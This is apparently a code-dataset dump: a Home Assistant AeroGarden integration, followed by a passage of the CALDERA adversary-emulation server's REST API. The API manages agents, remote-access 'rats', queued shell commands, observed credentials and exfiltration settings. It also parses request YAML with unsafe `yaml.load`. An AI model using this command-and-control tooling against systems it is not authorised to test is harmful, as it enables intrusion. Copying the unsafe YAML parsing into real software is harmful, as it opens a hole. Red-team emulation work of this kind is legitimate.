garden_data['lightStat'] clock = garden_data['clock'] pumpStat = garden_data['pumpStat'] pumpHydro = garden_data['pumpHydro'] pumpRemind4Hour = garden_data['pumpRemind4Hour'] plantedType = garden_data['plantedType'] garden_name =base64decode(garden_data['plantedName']) totalDay = garden_data['totalDay'] plantedDay = garden_data['plantedDay'] nutriRemindDay = garden_data['nutriRemindDay'] alarmAllow = garden_data['alarmAllow'] plantedDate = garden_data['plantedDate'] nutrientDate = garden_data['nutrientDate'] updateDate = garden_data['updateDate'] createDate = garden_data['createDate'] swVersion = garden_data['swVersion'] hwVersion = garden_data['hwVersion'] bwVersion = garden_data['bwVersion'] oldPlantedDay = garden_data['oldPlantedDay'] deviceID = garden_data['deviceID'] deviceIP = garden_data['deviceIP'] except RequestException: _LOGGER.exception("Error communicating with AeroGarden") status = 'offline' return False #display extracted info hass.states.set('Aerogarden.garden_name',garden_name ) hass.states.set('Aerogarden.config_id',config_id ) hass.states.set('Aerogarden.airGuid',airGuid ) hass.states.set('Aerogarden.lightCycle',lightCycle ) hass.states.set('Aerogarden.pumpCycle',pumpCycle ) hass.states.set('Aerogarden.lightTemp',lightTemp ) hass.states.set('Aerogarden.lightStat',lightStat ) hass.states.set('Aerogarden.clock',clock ) hass.states.set('Aerogarden.pumpStat',pumpStat ) hass.states.set('Aerogarden.pumpHydro',pumpHydro ) hass.states.set('Aerogarden.pumpRemind4Hour',pumpRemind4Hour ) hass.states.set('Aerogarden.totalDay',totalDay ) hass.states.set('Aerogarden.plantedDay',plantedDay ) hass.states.set('Aerogarden.nutriRemindDay',nutriRemindDay ) hass.states.set('Aerogarden.alarmAllow',alarmAllow ) hass.states.set('Aerogarden.plantedDate',plantedDate ) hass.states.set('Aerogarden.nutrientDate',nutrientDate ) hass.states.set('Aerogarden.updateDate',updateDate ) hass.states.set('Aerogarden.createDate',createDate ) 
hass.states.set('Aerogarden.swVersion',swVersion ) hass.states.set('Aerogarden.hwVersion',hwVersion ) hass.states.set('Aerogarden.bwVersion',bwVersion ) hass.states.set('Aerogarden.oldPlantedDay',oldPlantedDay ) hass.states.set('Aerogarden.deviceID',deviceID ) hass.states.set('Aerogarden.deviceIP',deviceIP ) hass.states.set('Aerogarden.Status', status) return True
37.387597
93
0.695003
import logging import urllib import requests import base64 _LOGGER = logging.getLogger(__name__) DOMAIN = 'aerogarden' agent = "BountyWiFi/1.1.13 (iPhone; iOS 10.3.2; Scale/2.00)" port = "8080" host = "http://ec2-54-86-39-88.compute-1.amazonaws.com:" Login_call = "/api/Admin/Login" SetDictPushCount = "/api/CustomData/SetDictPushCount?userID=" QueryUserDevice = "/api/CustomData/QueryUserDevice" GetUserSetted = "/api/CustomData/GetUserSetted" QueryDeviceOnline = "/api/CustomData/QueryDeviceOnline" QueryDeviceStatus = "/api/CustomData/QueryDeviceStatus" UpdateDeviceConfig ="/api/CustomData/UpdateDeviceConfig" auth_data ="" encoded_mac = "" AERO_PARAMETERS = {} def base64decode(b): return base64.b64decode(b).decode('utf-8') def setup(hass, base_config): config = base_config.get(DOMAIN) encoded_email = urllib.parse.quote(config['mail']) encoded_password = urllib.parse.quote(config['password']) encoded_mac = urllib.parse.quote(config['aerogarden_mac_address']) auth_data = "mail=" + encoded_email + "&userPwd=" + encoded_password apiurl = str(host) + str(port) + str(Login_call) headers = { 'User-Agent': 'BountyWiFi/1.1.13 (iPhone; iOS 10.3.2; Scale/2.00)', "Content-Type": "application/x-www-form-urlencoded", "Connection": "keep-alive", "Accept": "*/*", "Accept-Encoding": "gzip, deflate" } try: r = requests.post(apiurl, data=auth_data, headers=headers) responce = r.json() userID =responce["code"] device_url = "airGuid=" + encoded_mac + "&userID=" + str(userID) apiurl = str(host) + str(port) + str(QueryDeviceStatus) r = requests.post(apiurl, data=str(device_url), headers=headers) garden_data = r.json() status = 'online' config_id= garden_data['configID'] airGuid = garden_data['airGuid'] lightCycle = garden_data['lightCycle'] pumpCycle = garden_data['pumpCycle'] lightTemp = garden_data['lightTemp'] lightStat = garden_data['lightStat'] clock = garden_data['clock'] pumpStat = garden_data['pumpStat'] pumpHydro = garden_data['pumpHydro'] pumpRemind4Hour = 
garden_data['pumpRemind4Hour'] plantedType = garden_data['plantedType'] garden_name =base64decode(garden_data['plantedName']) totalDay = garden_data['totalDay'] plantedDay = garden_data['plantedDay'] nutriRemindDay = garden_data['nutriRemindDay'] alarmAllow = garden_data['alarmAllow'] plantedDate = garden_data['plantedDate'] nutrientDate = garden_data['nutrientDate'] updateDate = garden_data['updateDate'] createDate = garden_data['createDate'] swVersion = garden_data['swVersion'] hwVersion = garden_data['hwVersion'] bwVersion = garden_data['bwVersion'] oldPlantedDay = garden_data['oldPlantedDay'] deviceID = garden_data['deviceID'] deviceIP = garden_data['deviceIP'] except RequestException: _LOGGER.exception("Error communicating with AeroGarden") status = 'offline' return False hass.states.set('Aerogarden.garden_name',garden_name ) hass.states.set('Aerogarden.config_id',config_id ) hass.states.set('Aerogarden.airGuid',airGuid ) hass.states.set('Aerogarden.lightCycle',lightCycle ) hass.states.set('Aerogarden.pumpCycle',pumpCycle ) hass.states.set('Aerogarden.lightTemp',lightTemp ) hass.states.set('Aerogarden.lightStat',lightStat ) hass.states.set('Aerogarden.clock',clock ) hass.states.set('Aerogarden.pumpStat',pumpStat ) hass.states.set('Aerogarden.pumpHydro',pumpHydro ) hass.states.set('Aerogarden.pumpRemind4Hour',pumpRemind4Hour ) hass.states.set('Aerogarden.totalDay',totalDay ) hass.states.set('Aerogarden.plantedDay',plantedDay ) hass.states.set('Aerogarden.nutriRemindDay',nutriRemindDay ) hass.states.set('Aerogarden.alarmAllow',alarmAllow ) hass.states.set('Aerogarden.plantedDate',plantedDate ) hass.states.set('Aerogarden.nutrientDate',nutrientDate ) hass.states.set('Aerogarden.updateDate',updateDate ) hass.states.set('Aerogarden.createDate',createDate ) hass.states.set('Aerogarden.swVersion',swVersion ) hass.states.set('Aerogarden.hwVersion',hwVersion ) hass.states.set('Aerogarden.bwVersion',bwVersion ) hass.states.set('Aerogarden.oldPlantedDay',oldPlantedDay ) 
hass.states.set('Aerogarden.deviceID',deviceID ) hass.states.set('Aerogarden.deviceIP',deviceIP ) hass.states.set('Aerogarden.Status', status) return True
true
true
f705eb236c6300bef2b2f2d6d212f2afda2a2e89
37,473
py
Python
caldera/app/api.py
omitroom13/caldera
7153f77941b9fe48d40850a49b8e252d251a4690
[ "Apache-2.0", "CC0-1.0" ]
null
null
null
caldera/app/api.py
omitroom13/caldera
7153f77941b9fe48d40850a49b8e252d251a4690
[ "Apache-2.0", "CC0-1.0" ]
null
null
null
caldera/app/api.py
omitroom13/caldera
7153f77941b9fe48d40850a49b8e252d251a4690
[ "Apache-2.0", "CC0-1.0" ]
null
null
null
import asyncio from datetime import datetime, timezone from functools import wraps import traceback import inspect import logging import ujson as json_module import hashlib import yaml from aiohttp import web import aiohttp import mongoengine import os from .engine.objects import Operation, Network, Domain, Log, ObservedHost, TechniqueMapping, Job, Rat, Host, \ ObservedRat, Adversary, CodedStep, ActiveConnection, Agent, AttackTechnique, AttackTactic, SiteUser, Setting, \ Opcodes, Artifactlist, ObservedFile, AttackList, JobException, ObservedSchtask, ObservedProcess, AttackGroup from .engine.objects import ObservedDomain, ObservedOSVersion, ObservedUser, ObservedShare, ObservedCredential, \ ObservedService, ObservedTimeDelta, ObservedRegKey, ObservedPersistence from . import authentication as auth from .engine.database import native_types from . import ddp from . import attack from . import util from . import interface from . import extern log = logging.getLogger(__name__) routes = [] def api(uri, methods, objects=None, get=None, auth_group=None, headers=None): """This is a decorator for web api endpoints Args: uri: The URI for the API, can contain keywords denoted by '{}' which indicate objects: a list of tuples methods: the list of HTTP methods this API accepts auth_group: the group that the token must be in for access to this API headers: A list of headers to return with the Response """ if objects is None: objects = {} if get is None: get = {} if auth_group is None: auth_group = [] if headers is None: headers = {} def decorator(f): @wraps(f) async def decorated(req, token, url_match): kwargs = {} # Map id to object for name, _class in objects.items(): if name in url_match: # If this fails and the request type is 'GET', # then an exception should be returned try: kwargs[name] = _class.objects.with_id(url_match[name]) if kwargs[name] is None: return web.HTTPBadRequest() except (mongoengine.errors.ValidationError, ): # The client has sent an invalid id in the URL 
return web.HTTPBadRequest() # Now set the default get parameters # For cases where we see args like ?arg1=value1&arg2&... # arg2 is set to '' # but change it to True instead trueified = {k: True if v == '' else v for k, v in req.GET.items()} for k, v in get.items(): kwargs[k] = trueified.get(k, v) sig = inspect.signature(f) if 'token' in sig.parameters: kwargs['token'] = token # Finally format the output as json (or jsonfm) results = await f(req, **kwargs) if isinstance(results, web.StreamResponse): return results else: json = json_module.dumps(native_types(results), sort_keys=True, indent=4) return web.Response(text=json, content_type='application/json', headers=headers) async def entrypoint(req): host = None try: # ensure this member is authorized token = auth.Token(req.cookies.get('AUTH')) l = [g for g in auth_group if token.in_group(g)] if len(l) == 0: raise auth.NotAuthorized() # active connections peername = req.transport.get_extra_info('peername') if peername is not None: host_ip, port = peername if req.host: local_ip = req.host.split(":")[0] if local_ip == "localhost": local_ip = "127.0.0.1" else: local_ip = "127.0.0.1" token_host = None if token.in_group('agent'): agent = Agent.objects.with_id(token.session_info['_id']) if agent is None: raise auth.NotAuthorized agent.modify(**{'alive': True}) token_host = agent.host host = ActiveConnection.objects(ip=host_ip, host=token_host, local_ip=local_ip).first() if host is None: host = ActiveConnection(ip=host_ip, host=token_host, local_ip=local_ip, connections=0).save() host.update(inc__connections=1) resp = await decorated(req, token, req.match_info) return resp except auth.NotAuthorized: return web.HTTPForbidden() except Exception: traceback.print_exc() results = {'error': 'exception in ' + f.__name__} output = json_module.dumps(results, sort_keys=True, indent=4) return web.HTTPInternalServerError(text=output, content_type='application/json') finally: if host: host.update(dec__connections=1) for method in 
methods: routes.append((method, uri, entrypoint)) return decorated return decorator def websocket(uri, auth_group=None): if auth_group is None: auth_group = [] def decorator(f): @wraps(f) async def entrypoint(req): try: # ensure this member is authorized token = auth.Token(req.cookies.get('AUTH')) l = [g for g in auth_group if token.in_group(g)] if len(l) == 0: raise auth.NotAuthorized() return await f(req) except auth.NotAuthorized: return web.HTTPForbidden() except Exception: traceback.print_exc() results = {'error': 'exception in ' + f.__name__} output = json_module.dumps(results, sort_keys=True, indent=4) return web.HTTPInternalServerError(text=output, content_type='application/json') routes.append(('GET', uri, entrypoint)) return entrypoint return decorator # Example usage: # GET /api/jobs # POST /api/jobs { 'action': 'install_service', 'host': 'mm198673-pc', ... } @api('/api/jobs', methods=['GET', 'POST'], get={'status': None, 'wait': False}, auth_group=['human', 'agent']) async def query_jobs(request, token, status, wait): if request.method == 'GET': query = {} if status: query['status'] = status if token.in_group('agent'): agent = Agent.objects.with_id(token.session_info['_id']) if not agent: raise auth.NotAuthorized() # are there any jobs for this agent? query.update({'agent': agent.id}) jobs = list(Job.objects(**query)) if not len(jobs) and wait is not False: # Now wait for jobs to be created try: jobs = [(await Job.wait_next(query))] except asyncio.CancelledError: return else: jobs = list(Job.objects(**query)) if not len(jobs) and wait is not False: jobs = [(await Job.wait_next(query))] return jobs elif request.method == 'POST': # only humans are allowed to create new jobs token.require_group('human') json = await request.json() return Job(**json).save().id # Example usage: # GET /api/jobs/<job> # POST /api/jobs/<job> { 'action': 'install_service', 'host': 'mm198673-pc', ... 
} @api('/api/jobs/{job}', methods=['GET', 'PUT', 'DELETE'], objects={'job': Job}, auth_group=['human', 'agent']) async def query_job(request, token, job): if request.method == 'GET': if token.in_group('agent'): # can only get jobs that are not completed and are for them if job['status'] in ("created", "pending") and str(job.agent.id) == token.session_info['_id']: return job else: raise auth.NotAuthorized() else: return job elif request.method == 'PUT': if token.in_group('agent'): # can only put jobs that are not completed and are for them if job.status in ("created", "pending") and str(job.agent.id) == token.session_info['_id']: json = await request.json() # whitelist legal fields if 'result' in json['action']: job['action']['result'] = json['action']['result'] if 'error' in json['action']: job['action']['error'] = json['action']['error'] if 'exception' in json['action']: job['action']['exception'] = json['action']['exception'] job['status'] = json.get('status', job.status) if job['status'] == "failed" and 'error' in job['action'] and job['action']['error'] == "no client": # Force update the clients list interface.get_clients(job.agent.host) # find the rat try: iv_name = job['action']["rats"]["args"][0] iv = Rat.objects(agent=job.agent, name=iv_name) iv.modify(**{'active': False}) except KeyError: log.warning("Could not find rat to remove for failed job") return job.save() else: raise auth.NotAuthorized() else: # human # Update the job json = await request.json() if json['create_time']: json['create_time'] = datetime.strptime(json['create_time'], "%Y-%m-%dT%H:%M:%S.%f") return job.save() elif request.method == 'DELETE': token.require_group('human') return job.delete() # Example usage: # POST /api/clients @api('/api/clients', methods=['POST'], auth_group=['agent']) async def query_clients(request, token): json = await request.json() # pid, elevated, executable_path agen = Agent.objects.with_id(token.session_info['_id']) # Get the list of known rats complete_names = 
{iv.name: iv for iv in Rat.objects(host=agen.host)} # Filter list for living rats known_names = {} for name, element in complete_names.items(): if element.active: known_names[name] = element # All of the currently running rats, as returned by the job active = {x['pid']: x for x in json} # Enumerate the active rats, and delete dead ones for name, iv in known_names.items(): if name not in active: iv.modify(**{'active': False}) else: a = active.pop(name) iv.update(**{'elevated': a['elevated'], 'executable': a['executable_path']}) # Any new rats need to be added for name in active: Rat(**{'agent': agen, 'host': agen.host, 'name': name, 'elevated': active[name]['elevated'], 'executable': active[name]['executable_path'], 'username': active[name]['username'].lower(), 'active': True}).save() return None # Example usage: # GET /api/networks # POST /api/networks { domain: 'mitre.org' } @api('/api/networks', methods=['GET', 'POST'], auth_group=['human']) async def query_networks(request): if request.method == 'GET': return Network.objects elif request.method == 'POST': json = await request.json() network = Network(**json).save() return network.id @api('/api/networks/{network}', methods=['GET', 'DELETE'], objects={'network': Network}, auth_group=['human']) async def query_network(request, network): if request.method == 'GET': return network elif request.method == 'DELETE': network.delete() @api('/api/heartbeat', methods=['GET'], auth_group=['agent']) async def agent_check_in(request, token): agen = Agent.objects.with_id(token.session_info['_id']) agen.modify(**{'check_in': datetime.now(timezone.utc), 'alive': True}) return True @api('/api/hosts', methods=['GET'], auth_group=['human']) async def query_hosts(request): return Host.objects @api('/api/domains', methods=['GET'], auth_group=['human']) async def query_domains(request): return Domain.objects @api('/api/domains/{domain}', methods=['GET'], objects={'domain': Domain}, auth_group=['human']) async def query_domain(request, 
domain): return domain @api('/api/domains/{domain}/hosts', methods=['GET'], objects={'domain': Domain}, auth_group=['human']) async def query_domainhosts(request, domain): return Host.objects(domain=domain) @api('/api/networks/{network}/hosts', methods=['GET'], objects={'network': Network}, auth_group=['human']) async def query_networkhosts(request, network): return network.hosts @api('/api/networks/{network}/hosts/{host}', methods=['GET', 'PUT', 'DELETE'], objects={'network': Network, 'host': Host}, auth_group=['human']) async def query_networkhosthosts(request, network, host): if request.method == 'GET': return host elif request.method == 'PUT': network.modify(push__hosts=host) elif request.method == 'DELETE': network.modify(pull__hosts=host) @api('/api/hosts/{host}/commands', methods=['GET', 'POST'], objects={'host': Host}, auth_group=['human']) async def query_commands(request, host): if request.method == 'GET': if 'hostname' in request.GET: hosts = Host.objects(hostname=request.GET['hostname']) return [x.host_command_result() for x in Job.objects(host__in=hosts)] else: return [x.host_command_result() for x in Job.objects(host=host)] elif request.method == 'POST': json = await request.json() return interface.agent_shell_command(host, json['command_line']).id @api('/api/hosts/{host}/commands/{job}', methods=['GET'], get={'wait': False}, objects={'host': Host, 'job': Job}, auth_group=['human']) async def query_command(request, wait, host, job): # start waiting for the job before reloading to avoid missing the update if wait is not False: try: await job.wait_till_completed() except JobException as e: log.warning(e.args) return job.host_command_result() @api('/api/rats', methods=['GET'], auth_group=['human']) async def query_ivs(request): query = {k: v for k, v in request.GET.items() if k == 'hostname'} return Rat.objects(**query) @api('/api/rats/{rat}', methods=['GET'], objects={'rat': Rat}, auth_group=['human']) async def query_iv(rat): return rat 
@api('/api/rats/{rat}/commands', methods=['GET', 'POST'], objects={'rat': Rat}, auth_group=['human']) async def query_ivcommands(request, rat): if request.method == 'GET': return [x.rat_command_result() for x in Job.objects(agent=rat.agent)] elif request.method == 'POST': json = await request.json() return Job.create_rat_command(rat, json["function"], **json["parameters"]).id @api('/api/rats/{rat}/commands/{job}', methods=['GET'], get={'wait': False}, objects={'rat': Rat, 'job': Job}, auth_group=['human']) async def query_ivcommand(request, wait, rat, job): # start waiting for the job before reloading to avoid missing the update if wait is not False: try: await job.wait_till_completed() except JobException as e: log.warning(e.args) return job.rat_result() @api('/api/operations', methods=['GET'], auth_group=['human']) async def query_operations(request): return Operation.objects @api('/api/opcodes', methods=['GET'], auth_group=['human']) async def get_opcodes(request): return Opcodes.arguments @api('/api/networks/{network}/operations', methods=['GET', 'POST'], objects={'network': Network}, auth_group=['human']) async def query_perations(request, network): if request.method == 'GET': return list(Operation.objects(network=network)) elif request.method == 'POST': json = await request.json() if json['start_type'] == 'existing' and 'start_rat' not in json: return None json['network'] = network json['status'] = 'start' json['status_state'] = '' json['log'] = Log().save() # Get the adversary adversary = Adversary.objects.with_id(json['adversary']) json['steps'] = [x.name for x in adversary.steps] operation = Operation(**json).save() return operation.id @api('/api/networks/{network}/operations/{operation}', methods=['GET', 'PUT', 'DELETE', 'PATCH'], get={'wait': False}, objects={'network': Network, 'operation': Operation}, auth_group=['human']) async def query_operation(request, network, operation, wait): if request.method == 'GET': if wait: wait = json_module.loads(wait) 
wait["id"] = operation.id log.info("Wait: {}".format(wait)) # TODO fix race condition here new = list(Operation.objects(**wait)) if len(new) == 0: del wait["id"] new = [await operation.wait(wait)] return new[0] return operation elif request.method == 'PUT': json = await request.json() json['network_id'] = network.id json['hosts'] = network.hosts return operation.update(**json) elif request.method == 'DELETE': return operation.delete() elif request.method == 'PATCH': json = await request.json() operation.update(__raw__={'$set': json}) @api('/api/agents', methods=['GET'], auth_group=['human']) async def query_agents(request): return Agent.objects @api('/api/logs', methods=['GET'], auth_group=['human']) async def query_logs(request): return Log.objects @api('/api/logs/{log}', methods=['GET'], objects={'log': Log}, auth_group=['human']) async def query_log(request, log): return log @api('/api/agents/{agent}', methods=['GET'], objects={'agent': Agent}, auth_group=['human']) async def query_agent(request, agent): return agent @api('/api/adversaries', methods=['GET', 'POST'], auth_group=['human']) async def query_adversaries(request): if request.method == 'GET': return Adversary.objects elif request.method == 'POST': json = await request.json() json['artifactlists'] = [Artifactlist.objects.with_id(x) for x in json['artifactlists']] json['steps'] = [CodedStep.objects.with_id(x) for x in json['steps']] return Adversary(**json).save().id @api('/api/adversaries/{adversary}', methods=['GET', 'PUT', 'DELETE'], objects={'adversary': Adversary}, auth_group=['human']) async def query_adversary(request, adversary): if request.method == 'GET': return adversary elif request.method == 'PUT': if (adversary.protected): new_adv = {} new_adv['name'] = adversary['name'] new_adv['steps'] = adversary['steps'] new_adv['exfil_method'] = adversary['exfil_method'] new_adv['exfil_port'] = adversary['exfil_port'] new_adv['exfil_address'] = adversary['exfil_address'] new_adv['artifactlists'] = 
adversary['artifactlists'] adversary = Adversary(**new_adv).save() # Update the adversary json = await request.json() json['artifactlists'] = [Artifactlist.objects.with_id(x) for x in json['artifactlists']] json['steps'] = [CodedStep.objects.with_id(x) for x in json['steps']] adversary.update(**json) return adversary.id elif request.method == 'DELETE': if not adversary.protected: return adversary.delete() @api('/api/step', methods=['GET'], auth_group=['human']) async def query_step(request): return CodedStep.objects @api('/api/site_user', methods=['GET', 'POST'], auth_group=['admin']) async def query_siteusers(request): if request.method == 'GET': return SiteUser.objects.only('username', 'groups', 'email', 'last_login') elif request.method == 'POST': json = await request.json() username = json['username'] email = json.get('email', '') password = json.get('password', None) groups = ['human'] if json.get('admin', False): groups.append('admin') return auth.register_user(username, groups, password=password, email=email).id @api('/api/site_user/{user}', methods=['GET', 'DELETE'], objects={'user': SiteUser}, auth_group=['admin']) async def query_siteuser(request, token, user): if request.method == 'GET': return user.only('username', 'groups', 'email', 'last_login') elif request.method == 'DELETE': if token.session_info['_id'] != str(user.id): return user.delete() @api('/api/site_user/{user}/admin', methods=['PUT', 'DELETE'], objects={'user': SiteUser}, auth_group=['admin']) async def query_siteuser_admin(request, token, user): if request.method == 'PUT': user.modify(push__groups='admin') elif request.method == 'DELETE': if SiteUser.objects(groups='admin').count() > 1 and token.session_info['_id'] != str(user.id): user.modify(pull__groups='admin') @api('/api/site_user/{user}/password', methods=['POST'], objects={'user': SiteUser}, auth_group=['admin', 'human']) async def query_siteuser_password(request, token, user): json = await request.json() if 'password' in json: if 
token.in_group('admin') or token.session_info['_id'] == str(user.id): auth.user_change_password(user, json['password']) @api('/api/site_user/{user}/email', methods=['POST'], objects={'user': SiteUser}, auth_group=['admin']) async def query_siteuser_email(request, user): json = await request.json() if 'email' in json: user.update(email=json['email']) @api('/api/save_file', methods=['POST'], auth_group=['admin']) async def save_file(request): json = await request.json() if 'edited' in json and 'file' in json: file_path = util.get_path(json['file']) if json['file'].startswith("[-d-]") or file_path is None: return core = util.encrypt_file(json['edited']) with open(file_path, 'wb') as handle: core.tofile(handle) @api('/api/list_file', methods=['GET'], auth_group=['admin']) async def list_files(request): return util.list_files() @api('/api/load_file', methods=['POST'], auth_group=['admin']) async def load_file(request): json = await request.json() if 'file' in json: file_path = util.get_path(json['file']) if json['file'].startswith("[-d-]") or json['file'] == '' or file_path is None: return if file_path.startswith('[m]'): return file_path with open(file_path, 'rb') as handle: data = handle.read() return util.decrypt_file(data) @api('/api/load_psexec', methods=['GET'], auth_group=['admin']) async def load_psexec(request): extern.load_psexec() Setting.objects.first().update(last_psexec_update=util.tz_utcnow()) @api('/api/load_attack', methods=['GET'], auth_group=['admin']) async def load_attack(request): attack.refresh_attack() Setting.objects.first().update(last_attack_update=util.tz_utcnow()) @api('/api/update_depth', methods=['POST'], auth_group=['admin']) async def update_recursion_limit(request): json = await request.json() if 'new_value' in json: Setting.objects.first().modify(recursion_limit=json['new_value']) @api('/api/group_mimic', methods=['GET'], auth_group=['admin', 'human']) async def group_coverage(request): temp_list = [] core = {} for step in 
CodedStep.objects: for mapping in step.mapping: temp_list.append(mapping.technique) groups = AttackGroup.objects for entry in groups: temp = {} breakdown = {} decision = [] for tech in entry.techniques: temp[tech.name] = (tech in temp_list) decision.append(tech in temp_list) breakdown['techniques'] = temp if (False not in decision) and (len(decision) > 2): breakdown['conclusion'] = 'Can Fully Emulate' else: breakdown['conclusion'] = 'Can Not Fully Emulate' core[entry.name] = breakdown return core @api('/api/steps/{step}/mapping', methods=['POST', 'DELETE'], objects={'step': CodedStep}, auth_group=['human']) async def post_step_mapping(request, step): if request.method == 'POST': json = await request.json() if 'tactics' not in json or 'technique' not in json: return tactics = json['tactics'] technique = json['technique'] try: tech = AttackTechnique.objects.with_id(technique) for tactic in tactics: tac = AttackTactic.objects.with_id(tactic) step.modify(push__mapping=TechniqueMapping(technique=tech, tactic=tac)) except (TypeError, mongoengine.errors.ValidationError): return elif request.method == 'DELETE': json = await request.json() if 'tactic' not in json or 'technique' not in json: return tactic = json['tactic'] technique = json['technique'] try: tech = AttackTechnique.objects.with_id(technique) tac = AttackTactic.objects.with_id(tactic) for mapping in step.mapping: if mapping.tactic == tac and mapping.technique == tech: step.modify(pull__mapping=mapping) except (TypeError, mongoengine.errors.ValidationError): return @api('/api/steps/{step}/mapping/load_defaults', methods=['GET'], objects={'step': CodedStep}, auth_group=['human']) async def get_step_mapping_defaults(request, step): step.update(mapping=step.default_mapping) @api('/api/attack_download.json', methods=['GET'], auth_group=['human'], headers={'Content-Disposition': 'attachment'}) async def get_all_attack_stuff(request): try: techniques = [] for technique in AttackTechnique.objects: this_technique = 
technique.to_dict() this_technique['tactics'] = [x.name for x in technique.tactics] del this_technique['_id'] techniques.append(this_technique) tactics = [x.to_dict() for x in AttackTactic.objects] for tactic in tactics: del tactic["_id"] return {"techniques": techniques, "tactics": tactics} except (TypeError, mongoengine.errors.ValidationError): return @api('/api/generated/{function}', methods=["POST"], auth_group=['admin']) async def generated_dispatcher(request): dispatched_function = request.match_info['function'] request_json = await request.json() job = getattr(interface, dispatched_function)(**request_json) try: await job.wait_till_completed() return job.action['result'] except JobException: return job.action['error'] @api('/api/artifactlists', methods=['GET', 'POST'], auth_group=['human']) async def get_artifactlists(request): if request.method == 'GET': return Artifactlist.objects elif request.method == 'POST': if request.content_type == "application/json": content = await request.json() elif request.content_type == "text/x-yaml": try: content = format_yaml(await request.text()) except (yaml.scanner.ScannerError, yaml.parser.ParserError): return web.Response(status=400, text="The yaml was not properly formatted") else: return web.Response(status=400) try: return Artifactlist(**content).save().id except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e: return web.Response(status=400, text=str(e)) @api('/api/artifactlists/{artifactlist}', methods=['GET', 'PUT', 'DELETE'], objects={'artifactlist': Artifactlist}, auth_group=['human']) async def query_artifactlist(request, artifactlist): if request.method == 'GET': return artifactlist elif request.method == 'PUT': if request.content_type == "application/json": content = await request.json() elif request.content_type == "text/x-yaml": try: content = format_yaml(await request.text()) except (yaml.scanner.ScannerError, yaml.parser.ParserError): return web.Response(status=400, 
text="The yaml was not properly formatted") else: return web.Response(status=400) try: artifactlist.update(**content) return artifactlist.id except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e: return web.Response(status=400, text=str(e)) elif request.method == 'DELETE': return artifactlist.delete() @api('/api/parse_artifactlist', methods=['POST'], auth_group=['human']) async def get_parse_artifactlist(request): try: parsed = format_yaml(await request.text()) Artifactlist(**parsed) return parsed except (yaml.scanner.ScannerError, yaml.parser.ParserError) as e: return web.Response(status=400, text="The yaml was not properly formatted: \n" + str(e.problem_mark) + '\n ' + str(e.problem)) except (mongoengine.errors.FieldDoesNotExist, mongoengine.errors.ValidationError) as e: return web.Response(status=400, text=str(e)) def format_yaml(yaml_content): parsed = yaml.load(yaml_content) cleaned = {} for k, v in parsed.items(): if isinstance(v, list) and len(v) == 1 and v[0] is None: cleaned[k] = [] else: cleaned[k] = v return cleaned @api('/api/bsf/{log}', methods=['GET'], objects={'log': Log}, auth_group=['human'], headers={'Content-Disposition': 'attachment; filename=\"bsf.json\"'}) async def query_bsf(request, log): return log["event_stream"] @api('/api/observed/credentials', methods=['GET'], auth_group=['human']) async def query_credentials(request): return ObservedCredential.objects @api('/api/observed/credentials/{credential}', methods=['GET'], objects={'credential': ObservedCredential}, auth_group=['human']) async def query_credential(request, token, credential): return credential @api('/api/observed/users', methods=['GET'], auth_group=['human']) async def query_users(request): return ObservedUser.objects @api('/api/observed/users/{user}', methods=['GET'], objects={'user': ObservedUser}, auth_group=['human']) async def query_user(request, token, user): return user @api('/api/observed/shares', methods=['GET'], auth_group=['human']) 
async def query_shares(request): return ObservedShare.objects @api('/api/observed/shares/{share}', methods=['GET'], objects={'share': ObservedShare}, auth_group=['human']) async def query_share(request, token, share): return share @api('/api/observed/files', methods=['GET'], auth_group=['human']) async def query_files(request): return ObservedFile.objects @api('/api/observed/files/{file}', methods=['GET'], objects={'file': ObservedFile}, auth_group=['human']) async def query_file(request, token, file): return file @api('/api/observed/domains', methods=['GET'], auth_group=['human']) async def query_domains(request): return ObservedDomain.objects @api('/api/observed/domains/{domain}', methods=['GET'], objects={'domain': ObservedDomain}, auth_group=['human']) async def query_domain(request, token, domain): return domain @api('/api/observed/os_versions', methods=['GET'], auth_group=['human']) async def query_os_versions(request): return ObservedOsversion.objects @api('/api/observed/os_versions/{os_version}', methods=['GET'], objects={'os_version': ObservedOSVersion}, auth_group=['human']) async def query_os_version(request, token, os_version): return os_version @api('/api/observed/hosts', methods=['GET'], auth_group=['human']) async def query_hosts(request): return ObservedHost.objects @api('/api/observed/hosts/{host}', methods=['GET'], objects={'host': ObservedHost}, auth_group=['human']) async def query_host(request, token, host): return host @api('/api/observed/schtasks', methods=['GET'], auth_group=['human']) async def query_schtasks(request): return ObservedSchtask.objects @api('/api/observed/schtasks/{schtask}', methods=['GET'], objects={'schtask': ObservedSchtask}, auth_group=['human']) async def query_schtask(request, token, schtask): return schtask @api('/api/observed/services', methods=['GET'], auth_group=['human']) async def query_timedeltas(request): return ObservedService.objects @api('/api/observed/services/{service}', methods=['GET'], objects={'service': 
ObservedService}, auth_group=['human']) async def query_timedelta(request, token, service): return service @api('/api/observed/timedeltas', methods=['GET'], auth_group=['human']) async def query_timedeltas(request): return ObservedTimeDelta.objects @api('/api/observed/timedeltas/{timedelta}', methods=['GET'], objects={'timedelta': ObservedTimeDelta}, auth_group=['human']) async def query_timedelta(request, token, timedelta): return timedelta @api('/api/observed/rats', methods=['GET'], auth_group=['human']) async def query_rats(request): return ObservedRat.objects @api('/api/observed/rats/{rat}', methods=['GET'], objects={'rat': ObservedRat}, auth_group=['human']) async def query_rat(request, token, rat): return rat @api('/api/observed/registry_keys', methods=['GET'], auth_group=['human']) async def query_registry_keys(request): return ObservedRegKey.objects @api('/api/observed/registry_keys/{registry_key}', methods=['GET'], objects={'registry_key': ObservedRegKey}, auth_group=['human']) async def query_regkey(request, token, registry_key): return registry_key @api('/api/observed/persistence', methods=['GET'], auth_group=['human']) async def query_persistence_all(request): return ObservedPersistence.objects @api('/api/observed/persistence/{persistence}', methods=['GET'], objects={'persistence': ObservedPersistence}, auth_group=['human']) async def query_persistence(request, token, persistence): return persistence @api('/api/observed/processes', methods=['GET'], auth_group=['human']) async def query_processes(request): return ObservedProcess.objects @api('/api/observed/processes/{process}', methods=['GET'], objects={'process': ObservedProcess}, auth_group=['human']) async def query_process(request, token, process): return process @api('/api/step', methods=['GET'], auth_group=['human']) async def query_step(request): return CodedStep.objects @websocket('/websocket', auth_group=["human"]) async def wb_operation(request): ws = web.WebSocketResponse() await 
